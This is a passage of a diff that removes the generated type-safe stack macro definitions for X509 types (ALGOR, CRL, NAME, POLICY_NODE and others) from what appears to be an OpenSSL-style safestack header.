-#define sk_X509_ALGOR_zero(st) SKM_sk_zero(X509_ALGOR, (st))
-#define sk_X509_ALGOR_push(st, val) SKM_sk_push(X509_ALGOR, (st), (val))
-#define sk_X509_ALGOR_unshift(st, val) SKM_sk_unshift(X509_ALGOR, (st), (val))
-#define sk_X509_ALGOR_find(st, val) SKM_sk_find(X509_ALGOR, (st), (val))
-#define sk_X509_ALGOR_find_ex(st, val) SKM_sk_find_ex(X509_ALGOR, (st), (val))
-#define sk_X509_ALGOR_delete(st, i) SKM_sk_delete(X509_ALGOR, (st), (i))
-#define sk_X509_ALGOR_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_ALGOR, (st), (ptr))
-#define sk_X509_ALGOR_insert(st, val, i) SKM_sk_insert(X509_ALGOR, (st), (val), (i))
-#define sk_X509_ALGOR_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_ALGOR, (st), (cmp))
-#define sk_X509_ALGOR_dup(st) SKM_sk_dup(X509_ALGOR, st)
-#define sk_X509_ALGOR_pop_free(st, free_func) SKM_sk_pop_free(X509_ALGOR, (st), (free_func))
-#define sk_X509_ALGOR_shift(st) SKM_sk_shift(X509_ALGOR, (st))
-#define sk_X509_ALGOR_pop(st) SKM_sk_pop(X509_ALGOR, (st))
-#define sk_X509_ALGOR_sort(st) SKM_sk_sort(X509_ALGOR, (st))
-#define sk_X509_ALGOR_is_sorted(st) SKM_sk_is_sorted(X509_ALGOR, (st))
-
-#define sk_X509_ATTRIBUTE_new(cmp) SKM_sk_new(X509_ATTRIBUTE, (cmp))
-#define sk_X509_ATTRIBUTE_new_null() SKM_sk_new_null(X509_ATTRIBUTE)
-#define sk_X509_ATTRIBUTE_free(st) SKM_sk_free(X509_ATTRIBUTE, (st))
-#define sk_X509_ATTRIBUTE_num(st) SKM_sk_num(X509_ATTRIBUTE, (st))
-#define sk_X509_ATTRIBUTE_value(st, i) SKM_sk_value(X509_ATTRIBUTE, (st), (i))
-#define sk_X509_ATTRIBUTE_set(st, i, val) SKM_sk_set(X509_ATTRIBUTE, (st), (i), (val))
-#define sk_X509_ATTRIBUTE_zero(st) SKM_sk_zero(X509_ATTRIBUTE, (st))
-#define sk_X509_ATTRIBUTE_push(st, val) SKM_sk_push(X509_ATTRIBUTE, (st), (val))
-#define sk_X509_ATTRIBUTE_unshift(st, val) SKM_sk_unshift(X509_ATTRIBUTE, (st), (val))
-#define sk_X509_ATTRIBUTE_find(st, val) SKM_sk_find(X509_ATTRIBUTE, (st), (val))
-#define sk_X509_ATTRIBUTE_find_ex(st, val) SKM_sk_find_ex(X509_ATTRIBUTE, (st), (val))
-#define sk_X509_ATTRIBUTE_delete(st, i) SKM_sk_delete(X509_ATTRIBUTE, (st), (i))
-#define sk_X509_ATTRIBUTE_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_ATTRIBUTE, (st), (ptr))
-#define sk_X509_ATTRIBUTE_insert(st, val, i) SKM_sk_insert(X509_ATTRIBUTE, (st), (val), (i))
-#define sk_X509_ATTRIBUTE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_ATTRIBUTE, (st), (cmp))
-#define sk_X509_ATTRIBUTE_dup(st) SKM_sk_dup(X509_ATTRIBUTE, st)
-#define sk_X509_ATTRIBUTE_pop_free(st, free_func) SKM_sk_pop_free(X509_ATTRIBUTE, (st), (free_func))
-#define sk_X509_ATTRIBUTE_shift(st) SKM_sk_shift(X509_ATTRIBUTE, (st))
-#define sk_X509_ATTRIBUTE_pop(st) SKM_sk_pop(X509_ATTRIBUTE, (st))
-#define sk_X509_ATTRIBUTE_sort(st) SKM_sk_sort(X509_ATTRIBUTE, (st))
-#define sk_X509_ATTRIBUTE_is_sorted(st) SKM_sk_is_sorted(X509_ATTRIBUTE, (st))
-
-#define sk_X509_CRL_new(cmp) SKM_sk_new(X509_CRL, (cmp))
-#define sk_X509_CRL_new_null() SKM_sk_new_null(X509_CRL)
-#define sk_X509_CRL_free(st) SKM_sk_free(X509_CRL, (st))
-#define sk_X509_CRL_num(st) SKM_sk_num(X509_CRL, (st))
-#define sk_X509_CRL_value(st, i) SKM_sk_value(X509_CRL, (st), (i))
-#define sk_X509_CRL_set(st, i, val) SKM_sk_set(X509_CRL, (st), (i), (val))
-#define sk_X509_CRL_zero(st) SKM_sk_zero(X509_CRL, (st))
-#define sk_X509_CRL_push(st, val) SKM_sk_push(X509_CRL, (st), (val))
-#define sk_X509_CRL_unshift(st, val) SKM_sk_unshift(X509_CRL, (st), (val))
-#define sk_X509_CRL_find(st, val) SKM_sk_find(X509_CRL, (st), (val))
-#define sk_X509_CRL_find_ex(st, val) SKM_sk_find_ex(X509_CRL, (st), (val))
-#define sk_X509_CRL_delete(st, i) SKM_sk_delete(X509_CRL, (st), (i))
-#define sk_X509_CRL_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_CRL, (st), (ptr))
-#define sk_X509_CRL_insert(st, val, i) SKM_sk_insert(X509_CRL, (st), (val), (i))
-#define sk_X509_CRL_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_CRL, (st), (cmp))
-#define sk_X509_CRL_dup(st) SKM_sk_dup(X509_CRL, st)
-#define sk_X509_CRL_pop_free(st, free_func) SKM_sk_pop_free(X509_CRL, (st), (free_func))
-#define sk_X509_CRL_shift(st) SKM_sk_shift(X509_CRL, (st))
-#define sk_X509_CRL_pop(st) SKM_sk_pop(X509_CRL, (st))
-#define sk_X509_CRL_sort(st) SKM_sk_sort(X509_CRL, (st))
-#define sk_X509_CRL_is_sorted(st) SKM_sk_is_sorted(X509_CRL, (st))
-
-#define sk_X509_EXTENSION_new(cmp) SKM_sk_new(X509_EXTENSION, (cmp))
-#define sk_X509_EXTENSION_new_null() SKM_sk_new_null(X509_EXTENSION)
-#define sk_X509_EXTENSION_free(st) SKM_sk_free(X509_EXTENSION, (st))
-#define sk_X509_EXTENSION_num(st) SKM_sk_num(X509_EXTENSION, (st))
-#define sk_X509_EXTENSION_value(st, i) SKM_sk_value(X509_EXTENSION, (st), (i))
-#define sk_X509_EXTENSION_set(st, i, val) SKM_sk_set(X509_EXTENSION, (st), (i), (val))
-#define sk_X509_EXTENSION_zero(st) SKM_sk_zero(X509_EXTENSION, (st))
-#define sk_X509_EXTENSION_push(st, val) SKM_sk_push(X509_EXTENSION, (st), (val))
-#define sk_X509_EXTENSION_unshift(st, val) SKM_sk_unshift(X509_EXTENSION, (st), (val))
-#define sk_X509_EXTENSION_find(st, val) SKM_sk_find(X509_EXTENSION, (st), (val))
-#define sk_X509_EXTENSION_find_ex(st, val) SKM_sk_find_ex(X509_EXTENSION, (st), (val))
-#define sk_X509_EXTENSION_delete(st, i) SKM_sk_delete(X509_EXTENSION, (st), (i))
-#define sk_X509_EXTENSION_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_EXTENSION, (st), (ptr))
-#define sk_X509_EXTENSION_insert(st, val, i) SKM_sk_insert(X509_EXTENSION, (st), (val), (i))
-#define sk_X509_EXTENSION_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_EXTENSION, (st), (cmp))
-#define sk_X509_EXTENSION_dup(st) SKM_sk_dup(X509_EXTENSION, st)
-#define sk_X509_EXTENSION_pop_free(st, free_func) SKM_sk_pop_free(X509_EXTENSION, (st), (free_func))
-#define sk_X509_EXTENSION_shift(st) SKM_sk_shift(X509_EXTENSION, (st))
-#define sk_X509_EXTENSION_pop(st) SKM_sk_pop(X509_EXTENSION, (st))
-#define sk_X509_EXTENSION_sort(st) SKM_sk_sort(X509_EXTENSION, (st))
-#define sk_X509_EXTENSION_is_sorted(st) SKM_sk_is_sorted(X509_EXTENSION, (st))
-
-#define sk_X509_INFO_new(cmp) SKM_sk_new(X509_INFO, (cmp))
-#define sk_X509_INFO_new_null() SKM_sk_new_null(X509_INFO)
-#define sk_X509_INFO_free(st) SKM_sk_free(X509_INFO, (st))
-#define sk_X509_INFO_num(st) SKM_sk_num(X509_INFO, (st))
-#define sk_X509_INFO_value(st, i) SKM_sk_value(X509_INFO, (st), (i))
-#define sk_X509_INFO_set(st, i, val) SKM_sk_set(X509_INFO, (st), (i), (val))
-#define sk_X509_INFO_zero(st) SKM_sk_zero(X509_INFO, (st))
-#define sk_X509_INFO_push(st, val) SKM_sk_push(X509_INFO, (st), (val))
-#define sk_X509_INFO_unshift(st, val) SKM_sk_unshift(X509_INFO, (st), (val))
-#define sk_X509_INFO_find(st, val) SKM_sk_find(X509_INFO, (st), (val))
-#define sk_X509_INFO_find_ex(st, val) SKM_sk_find_ex(X509_INFO, (st), (val))
-#define sk_X509_INFO_delete(st, i) SKM_sk_delete(X509_INFO, (st), (i))
-#define sk_X509_INFO_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_INFO, (st), (ptr))
-#define sk_X509_INFO_insert(st, val, i) SKM_sk_insert(X509_INFO, (st), (val), (i))
-#define sk_X509_INFO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_INFO, (st), (cmp))
-#define sk_X509_INFO_dup(st) SKM_sk_dup(X509_INFO, st)
-#define sk_X509_INFO_pop_free(st, free_func) SKM_sk_pop_free(X509_INFO, (st), (free_func))
-#define sk_X509_INFO_shift(st) SKM_sk_shift(X509_INFO, (st))
-#define sk_X509_INFO_pop(st) SKM_sk_pop(X509_INFO, (st))
-#define sk_X509_INFO_sort(st) SKM_sk_sort(X509_INFO, (st))
-#define sk_X509_INFO_is_sorted(st) SKM_sk_is_sorted(X509_INFO, (st))
-
-#define sk_X509_LOOKUP_new(cmp) SKM_sk_new(X509_LOOKUP, (cmp))
-#define sk_X509_LOOKUP_new_null() SKM_sk_new_null(X509_LOOKUP)
-#define sk_X509_LOOKUP_free(st) SKM_sk_free(X509_LOOKUP, (st))
-#define sk_X509_LOOKUP_num(st) SKM_sk_num(X509_LOOKUP, (st))
-#define sk_X509_LOOKUP_value(st, i) SKM_sk_value(X509_LOOKUP, (st), (i))
-#define sk_X509_LOOKUP_set(st, i, val) SKM_sk_set(X509_LOOKUP, (st), (i), (val))
-#define sk_X509_LOOKUP_zero(st) SKM_sk_zero(X509_LOOKUP, (st))
-#define sk_X509_LOOKUP_push(st, val) SKM_sk_push(X509_LOOKUP, (st), (val))
-#define sk_X509_LOOKUP_unshift(st, val) SKM_sk_unshift(X509_LOOKUP, (st), (val))
-#define sk_X509_LOOKUP_find(st, val) SKM_sk_find(X509_LOOKUP, (st), (val))
-#define sk_X509_LOOKUP_find_ex(st, val) SKM_sk_find_ex(X509_LOOKUP, (st), (val))
-#define sk_X509_LOOKUP_delete(st, i) SKM_sk_delete(X509_LOOKUP, (st), (i))
-#define sk_X509_LOOKUP_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_LOOKUP, (st), (ptr))
-#define sk_X509_LOOKUP_insert(st, val, i) SKM_sk_insert(X509_LOOKUP, (st), (val), (i))
-#define sk_X509_LOOKUP_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_LOOKUP, (st), (cmp))
-#define sk_X509_LOOKUP_dup(st) SKM_sk_dup(X509_LOOKUP, st)
-#define sk_X509_LOOKUP_pop_free(st, free_func) SKM_sk_pop_free(X509_LOOKUP, (st), (free_func))
-#define sk_X509_LOOKUP_shift(st) SKM_sk_shift(X509_LOOKUP, (st))
-#define sk_X509_LOOKUP_pop(st) SKM_sk_pop(X509_LOOKUP, (st))
-#define sk_X509_LOOKUP_sort(st) SKM_sk_sort(X509_LOOKUP, (st))
-#define sk_X509_LOOKUP_is_sorted(st) SKM_sk_is_sorted(X509_LOOKUP, (st))
-
-#define sk_X509_NAME_new(cmp) SKM_sk_new(X509_NAME, (cmp))
-#define sk_X509_NAME_new_null() SKM_sk_new_null(X509_NAME)
-#define sk_X509_NAME_free(st) SKM_sk_free(X509_NAME, (st))
-#define sk_X509_NAME_num(st) SKM_sk_num(X509_NAME, (st))
-#define sk_X509_NAME_value(st, i) SKM_sk_value(X509_NAME, (st), (i))
-#define sk_X509_NAME_set(st, i, val) SKM_sk_set(X509_NAME, (st), (i), (val))
-#define sk_X509_NAME_zero(st) SKM_sk_zero(X509_NAME, (st))
-#define sk_X509_NAME_push(st, val) SKM_sk_push(X509_NAME, (st), (val))
-#define sk_X509_NAME_unshift(st, val) SKM_sk_unshift(X509_NAME, (st), (val))
-#define sk_X509_NAME_find(st, val) SKM_sk_find(X509_NAME, (st), (val))
-#define sk_X509_NAME_find_ex(st, val) SKM_sk_find_ex(X509_NAME, (st), (val))
-#define sk_X509_NAME_delete(st, i) SKM_sk_delete(X509_NAME, (st), (i))
-#define sk_X509_NAME_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_NAME, (st), (ptr))
-#define sk_X509_NAME_insert(st, val, i) SKM_sk_insert(X509_NAME, (st), (val), (i))
-#define sk_X509_NAME_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_NAME, (st), (cmp))
-#define sk_X509_NAME_dup(st) SKM_sk_dup(X509_NAME, st)
-#define sk_X509_NAME_pop_free(st, free_func) SKM_sk_pop_free(X509_NAME, (st), (free_func))
-#define sk_X509_NAME_shift(st) SKM_sk_shift(X509_NAME, (st))
-#define sk_X509_NAME_pop(st) SKM_sk_pop(X509_NAME, (st))
-#define sk_X509_NAME_sort(st) SKM_sk_sort(X509_NAME, (st))
-#define sk_X509_NAME_is_sorted(st) SKM_sk_is_sorted(X509_NAME, (st))
-
-#define sk_X509_NAME_ENTRY_new(cmp) SKM_sk_new(X509_NAME_ENTRY, (cmp))
-#define sk_X509_NAME_ENTRY_new_null() SKM_sk_new_null(X509_NAME_ENTRY)
-#define sk_X509_NAME_ENTRY_free(st) SKM_sk_free(X509_NAME_ENTRY, (st))
-#define sk_X509_NAME_ENTRY_num(st) SKM_sk_num(X509_NAME_ENTRY, (st))
-#define sk_X509_NAME_ENTRY_value(st, i) SKM_sk_value(X509_NAME_ENTRY, (st), (i))
-#define sk_X509_NAME_ENTRY_set(st, i, val) SKM_sk_set(X509_NAME_ENTRY, (st), (i), (val))
-#define sk_X509_NAME_ENTRY_zero(st) SKM_sk_zero(X509_NAME_ENTRY, (st))
-#define sk_X509_NAME_ENTRY_push(st, val) SKM_sk_push(X509_NAME_ENTRY, (st), (val))
-#define sk_X509_NAME_ENTRY_unshift(st, val) SKM_sk_unshift(X509_NAME_ENTRY, (st), (val))
-#define sk_X509_NAME_ENTRY_find(st, val) SKM_sk_find(X509_NAME_ENTRY, (st), (val))
-#define sk_X509_NAME_ENTRY_find_ex(st, val) SKM_sk_find_ex(X509_NAME_ENTRY, (st), (val))
-#define sk_X509_NAME_ENTRY_delete(st, i) SKM_sk_delete(X509_NAME_ENTRY, (st), (i))
-#define sk_X509_NAME_ENTRY_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_NAME_ENTRY, (st), (ptr))
-#define sk_X509_NAME_ENTRY_insert(st, val, i) SKM_sk_insert(X509_NAME_ENTRY, (st), (val), (i))
-#define sk_X509_NAME_ENTRY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_NAME_ENTRY, (st), (cmp))
-#define sk_X509_NAME_ENTRY_dup(st) SKM_sk_dup(X509_NAME_ENTRY, st)
-#define sk_X509_NAME_ENTRY_pop_free(st, free_func) SKM_sk_pop_free(X509_NAME_ENTRY, (st), (free_func))
-#define sk_X509_NAME_ENTRY_shift(st) SKM_sk_shift(X509_NAME_ENTRY, (st))
-#define sk_X509_NAME_ENTRY_pop(st) SKM_sk_pop(X509_NAME_ENTRY, (st))
-#define sk_X509_NAME_ENTRY_sort(st) SKM_sk_sort(X509_NAME_ENTRY, (st))
-#define sk_X509_NAME_ENTRY_is_sorted(st) SKM_sk_is_sorted(X509_NAME_ENTRY, (st))
-
-#define sk_X509_OBJECT_new(cmp) SKM_sk_new(X509_OBJECT, (cmp))
-#define sk_X509_OBJECT_new_null() SKM_sk_new_null(X509_OBJECT)
-#define sk_X509_OBJECT_free(st) SKM_sk_free(X509_OBJECT, (st))
-#define sk_X509_OBJECT_num(st) SKM_sk_num(X509_OBJECT, (st))
-#define sk_X509_OBJECT_value(st, i) SKM_sk_value(X509_OBJECT, (st), (i))
-#define sk_X509_OBJECT_set(st, i, val) SKM_sk_set(X509_OBJECT, (st), (i), (val))
-#define sk_X509_OBJECT_zero(st) SKM_sk_zero(X509_OBJECT, (st))
-#define sk_X509_OBJECT_push(st, val) SKM_sk_push(X509_OBJECT, (st), (val))
-#define sk_X509_OBJECT_unshift(st, val) SKM_sk_unshift(X509_OBJECT, (st), (val))
-#define sk_X509_OBJECT_find(st, val) SKM_sk_find(X509_OBJECT, (st), (val))
-#define sk_X509_OBJECT_find_ex(st, val) SKM_sk_find_ex(X509_OBJECT, (st), (val))
-#define sk_X509_OBJECT_delete(st, i) SKM_sk_delete(X509_OBJECT, (st), (i))
-#define sk_X509_OBJECT_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_OBJECT, (st), (ptr))
-#define sk_X509_OBJECT_insert(st, val, i) SKM_sk_insert(X509_OBJECT, (st), (val), (i))
-#define sk_X509_OBJECT_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_OBJECT, (st), (cmp))
-#define sk_X509_OBJECT_dup(st) SKM_sk_dup(X509_OBJECT, st)
-#define sk_X509_OBJECT_pop_free(st, free_func) SKM_sk_pop_free(X509_OBJECT, (st), (free_func))
-#define sk_X509_OBJECT_shift(st) SKM_sk_shift(X509_OBJECT, (st))
-#define sk_X509_OBJECT_pop(st) SKM_sk_pop(X509_OBJECT, (st))
-#define sk_X509_OBJECT_sort(st) SKM_sk_sort(X509_OBJECT, (st))
-#define sk_X509_OBJECT_is_sorted(st) SKM_sk_is_sorted(X509_OBJECT, (st))
-
-#define sk_X509_POLICY_DATA_new(cmp) SKM_sk_new(X509_POLICY_DATA, (cmp))
-#define sk_X509_POLICY_DATA_new_null() SKM_sk_new_null(X509_POLICY_DATA)
-#define sk_X509_POLICY_DATA_free(st) SKM_sk_free(X509_POLICY_DATA, (st))
-#define sk_X509_POLICY_DATA_num(st) SKM_sk_num(X509_POLICY_DATA, (st))
-#define sk_X509_POLICY_DATA_value(st, i) SKM_sk_value(X509_POLICY_DATA, (st), (i))
-#define sk_X509_POLICY_DATA_set(st, i, val) SKM_sk_set(X509_POLICY_DATA, (st), (i), (val))
-#define sk_X509_POLICY_DATA_zero(st) SKM_sk_zero(X509_POLICY_DATA, (st))
-#define sk_X509_POLICY_DATA_push(st, val) SKM_sk_push(X509_POLICY_DATA, (st), (val))
-#define sk_X509_POLICY_DATA_unshift(st, val) SKM_sk_unshift(X509_POLICY_DATA, (st), (val))
-#define sk_X509_POLICY_DATA_find(st, val) SKM_sk_find(X509_POLICY_DATA, (st), (val))
-#define sk_X509_POLICY_DATA_find_ex(st, val) SKM_sk_find_ex(X509_POLICY_DATA, (st), (val))
-#define sk_X509_POLICY_DATA_delete(st, i) SKM_sk_delete(X509_POLICY_DATA, (st), (i))
-#define sk_X509_POLICY_DATA_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_POLICY_DATA, (st), (ptr))
-#define sk_X509_POLICY_DATA_insert(st, val, i) SKM_sk_insert(X509_POLICY_DATA, (st), (val), (i))
-#define sk_X509_POLICY_DATA_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_POLICY_DATA, (st), (cmp))
-#define sk_X509_POLICY_DATA_dup(st) SKM_sk_dup(X509_POLICY_DATA, st)
-#define sk_X509_POLICY_DATA_pop_free(st, free_func) SKM_sk_pop_free(X509_POLICY_DATA, (st), (free_func))
-#define sk_X509_POLICY_DATA_shift(st) SKM_sk_shift(X509_POLICY_DATA, (st))
-#define sk_X509_POLICY_DATA_pop(st) SKM_sk_pop(X509_POLICY_DATA, (st))
-#define sk_X509_POLICY_DATA_sort(st) SKM_sk_sort(X509_POLICY_DATA, (st))
-#define sk_X509_POLICY_DATA_is_sorted(st) SKM_sk_is_sorted(X509_POLICY_DATA, (st))
-
-#define sk_X509_POLICY_NODE_new(cmp) SKM_sk_new(X509_POLICY_NODE, (cmp))
-#define sk_X509_POLICY_NODE_new_null() SKM_sk_new_null(X509_POLICY_NODE)
-#define sk_X509_POLICY_NODE_free(st) SKM_sk_free(X509_POLICY_NODE, (st))
-#define sk_X509_POLICY_NODE_num(st) SKM_sk_num(X509_POLICY_NODE, (st))
-#define sk_X509_POLICY_NODE_value(st, i) SKM_sk_value(X509_POLICY_NODE, (st), (i))
-#define sk_X509_POLICY_NODE_set(st, i, val) SKM_sk_set(X509_POLICY_NODE, (st), (i), (val))
-#define sk_X509_POLICY_NODE_zero(st) SKM_sk_zero(X509_POLICY_NODE, (st))
-#define sk_X509_POLICY_NODE_push(st, val) SKM_sk_push(X509_POLICY_NODE, (st), (val))
-#define sk_X509_POLICY_NODE_unshift(st, val) SKM_sk_unshift(X509_POLICY_NODE, (st), (val))
-#define sk_X509_POLICY_NODE_find(st, val) SKM_sk_find(X509_POLICY_NODE, (st), (val))
-#define sk_X509_POLICY_NODE_find_ex(st, val) SKM_sk_find_ex(X509_POLICY_NODE, (st), (val))
-#define sk_X509_POLICY_NODE_delete(st, i) SKM_sk_delete(X509_POLICY_NODE, (st), (i))
-#define sk_X509_POLICY_NODE_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_POLICY_NODE, (st), (ptr))
-#define sk_X509_POLICY_NODE_insert(st, val, i) SKM_sk_insert(X509_POLICY_NODE, (st), (val), (i))
-#define sk_X509_POLICY_NODE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_POLICY_NODE, (st), (cmp))
-#define sk_X509_POLICY_NODE_dup(st) SKM_sk_dup(X509_POLICY_NODE, st)
-#define sk_X509_POLICY_NODE_pop_free(st, free_func) SKM_sk_pop_free(X509_POLICY_NODE, (st), (free_func))
-#define sk_X509_POLICY_NODE_shift(st) SKM_sk_shift(X509_POLICY_NODE, (st))
-#define sk_X509_POLICY_NODE_pop(st) SKM_sk_pop(X509_POLICY_NODE, (st))
-#define sk_X509_POLICY_NODE_sort(st) SKM_sk_sort(X509_POLICY_NODE, (st))
-#define sk_X509_POLICY_NODE_is_sorted(st) SKM_sk_is_sorted(X509_POLICY_NODE, (st))
-
-#define sk_X509_PURPOSE_new(cmp) SKM_sk_new(X509_PURPOSE, (cmp))
-#define sk_X509_PURPOSE_new_null() SKM_sk_new_null(X509_PURPOSE)
-#define sk_X509_PURPOSE_free(st) SKM_sk_free(X509_PURPOSE, (st))
-#define sk_X509_PURPOSE_num(st) SKM_sk_num(X509_PURPOSE, (st))
-#define sk_X509_PURPOSE_value(st, i) SKM_sk_value(X509_PURPOSE, (st), (i))
-#define sk_X509_PURPOSE_set(st, i, val) SKM_sk_set(X509_PURPOSE, (st), (i), (val))
-#define sk_X509_PURPOSE_zero(st) SKM_sk_zero(X509_PURPOSE, (st))
-#define sk_X509_PURPOSE_push(st, val) SKM_sk_push(X509_PURPOSE, (st), (val))
-#define sk_X509_PURPOSE_unshift(st, val) SKM_sk_unshift(X509_PURPOSE, (st), (val))
-#define sk_X509_PURPOSE_find(st, val) SKM_sk_find(X509_PURPOSE, (st), (val))
-#define sk_X509_PURPOSE_find_ex(st, val) SKM_sk_find_ex(X509_PURPOSE, (st), (val))
-#define sk_X509_PURPOSE_delete(st, i) SKM_sk_delete(X509_PURPOSE, (st), (i))
-#define sk_X509_PURPOSE_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_PURPOSE, (st), (ptr))
-#define sk_X509_PURPOSE_insert(st, val, i) SKM_sk_insert(X509_PURPOSE, (st), (val), (i))
-#define sk_X509_PURPOSE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_PURPOSE, (st), (cmp))
-#define sk_X509_PURPOSE_dup(st) SKM_sk_dup(X509_PURPOSE, st)
-#define sk_X509_PURPOSE_pop_free(st, free_func) SKM_sk_pop_free(X509_PURPOSE, (st), (free_func))
-#define sk_X509_PURPOSE_shift(st) SKM_sk_shift(X509_PURPOSE, (st))
-#define sk_X509_PURPOSE_pop(st) SKM_sk_pop(X509_PURPOSE, (st))
-#define sk_X509_PURPOSE_sort(st) SKM_sk_sort(X509_PURPOSE, (st))
-#define sk_X509_PURPOSE_is_sorted(st) SKM_sk_is_sorted(X509_PURPOSE, (st))
-
-#define sk_X509_REVOKED_new(cmp) SKM_sk_new(X509_REVOKED, (cmp))
-#define sk_X509_REVOKED_new_null() SKM_sk_new_null(X509_REVOKED)
-#define sk_X509_REVOKED_free(st) SKM_sk_free(X509_REVOKED, (st))
-#define sk_X509_REVOKED_num(st) SKM_sk_num(X509_REVOKED, (st))
-#define sk_X509_REVOKED_value(st, i) SKM_sk_value(X509_REVOKED, (st), (i))
-#define sk_X509_REVOKED_set(st, i, val) SKM_sk_set(X509_REVOKED, (st), (i), (val))
-#define sk_X509_REVOKED_zero(st) SKM_sk_zero(X509_REVOKED, (st))
-#define sk_X509_REVOKED_push(st, val) SKM_sk_push(X509_REVOKED, (st), (val))
-#define sk_X509_REVOKED_unshift(st, val) SKM_sk_unshift(X509_REVOKED, (st), (val))
-#define sk_X509_REVOKED_find(st, val) SKM_sk_find(X509_REVOKED, (st), (val))
-#define sk_X509_REVOKED_find_ex(st, val) SKM_sk_find_ex(X509_REVOKED, (st), (val))
-#define sk_X509_REVOKED_delete(st, i) SKM_sk_delete(X509_REVOKED, (st), (i))
-#define sk_X509_REVOKED_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_REVOKED, (st), (ptr))
-#define sk_X509_REVOKED_insert(st, val, i) SKM_sk_insert(X509_REVOKED, (st), (val), (i))
-#define sk_X509_REVOKED_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_REVOKED, (st), (cmp))
-#define sk_X509_REVOKED_dup(st) SKM_sk_dup(X509_REVOKED, st)
-#define sk_X509_REVOKED_pop_free(st, free_func) SKM_sk_pop_free(X509_REVOKED, (st), (free_func))
-#define sk_X509_REVOKED_shift(st) SKM_sk_shift(X509_REVOKED, (st))
-#define sk_X509_REVOKED_pop(st) SKM_sk_pop(X509_REVOKED, (st))
-#define sk_X509_REVOKED_sort(st) SKM_sk_sort(X509_REVOKED, (st))
-#define sk_X509_REVOKED_is_sorted(st) SKM_sk_is_sorted(X509_REVOKED, (st))
-
-#define sk_X509_TRUST_new(cmp) SKM_sk_new(X509_TRUST, (cmp))
-#define sk_X509_TRUST_new_null() SKM_sk_new_null(X509_TRUST)
-#define sk_X509_TRUST_free(st) SKM_sk_free(X509_TRUST, (st))
-#define sk_X509_TRUST_num(st) SKM_sk_num(X509_TRUST, (st))
-#define sk_X509_TRUST_value(st, i) SKM_sk_value(X509_TRUST, (st), (i))
-#define sk_X509_TRUST_set(st, i, val) SKM_sk_set(X509_TRUST, (st), (i), (val))
-#define sk_X509_TRUST_zero(st) SKM_sk_zero(X509_TRUST, (st))
-#define sk_X509_TRUST_push(st, val) SKM_sk_push(X509_TRUST, (st), (val))
-#define sk_X509_TRUST_unshift(st, val) SKM_sk_unshift(X509_TRUST, (st), (val))
-#define sk_X509_TRUST_find(st, val) SKM_sk_find(X509_TRUST, (st), (val))
-#define sk_X509_TRUST_find_ex(st, val) SKM_sk_find_ex(X509_TRUST, (st), (val))
-#define sk_X509_TRUST_delete(st, i) SKM_sk_delete(X509_TRUST, (st), (i))
-#define sk_X509_TRUST_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_TRUST, (st), (ptr))
-#define sk_X509_TRUST_insert(st, val, i) SKM_sk_insert(X509_TRUST, (st), (val), (i))
-#define sk_X509_TRUST_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_TRUST, (st), (cmp))
-#define sk_X509_TRUST_dup(st) SKM_sk_dup(X509_TRUST, st)
-#define sk_X509_TRUST_pop_free(st, free_func) SKM_sk_pop_free(X509_TRUST, (st), (free_func))
-#define sk_X509_TRUST_shift(st) SKM_sk_shift(X509_TRUST, (st))
-#define sk_X509_TRUST_pop(st) SKM_sk_pop(X509_TRUST, (st))
-#define sk_X509_TRUST_sort(st) SKM_sk_sort(X509_TRUST, (st))
-#define sk_X509_TRUST_is_sorted(st) SKM_sk_is_sorted(X509_TRUST, (st))
-
-#define sk_X509_VERIFY_PARAM_new(cmp) SKM_sk_new(X509_VERIFY_PARAM, (cmp))
-#define sk_X509_VERIFY_PARAM_new_null() SKM_sk_new_null(X509_VERIFY_PARAM)
-#define sk_X509_VERIFY_PARAM_free(st) SKM_sk_free(X509_VERIFY_PARAM, (st))
-#define sk_X509_VERIFY_PARAM_num(st) SKM_sk_num(X509_VERIFY_PARAM, (st))
-#define sk_X509_VERIFY_PARAM_value(st, i) SKM_sk_value(X509_VERIFY_PARAM, (st), (i))
-#define sk_X509_VERIFY_PARAM_set(st, i, val) SKM_sk_set(X509_VERIFY_PARAM, (st), (i), (val))
-#define sk_X509_VERIFY_PARAM_zero(st) SKM_sk_zero(X509_VERIFY_PARAM, (st))
-#define sk_X509_VERIFY_PARAM_push(st, val) SKM_sk_push(X509_VERIFY_PARAM, (st), (val))
-#define sk_X509_VERIFY_PARAM_unshift(st, val) SKM_sk_unshift(X509_VERIFY_PARAM, (st), (val))
-#define sk_X509_VERIFY_PARAM_find(st, val) SKM_sk_find(X509_VERIFY_PARAM, (st), (val))
-#define sk_X509_VERIFY_PARAM_find_ex(st, val) SKM_sk_find_ex(X509_VERIFY_PARAM, (st), (val))
-#define sk_X509_VERIFY_PARAM_delete(st, i) SKM_sk_delete(X509_VERIFY_PARAM, (st), (i))
-#define sk_X509_VERIFY_PARAM_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_VERIFY_PARAM, (st), (ptr))
-#define sk_X509_VERIFY_PARAM_insert(st, val, i) SKM_sk_insert(X509_VERIFY_PARAM, (st), (val), (i))
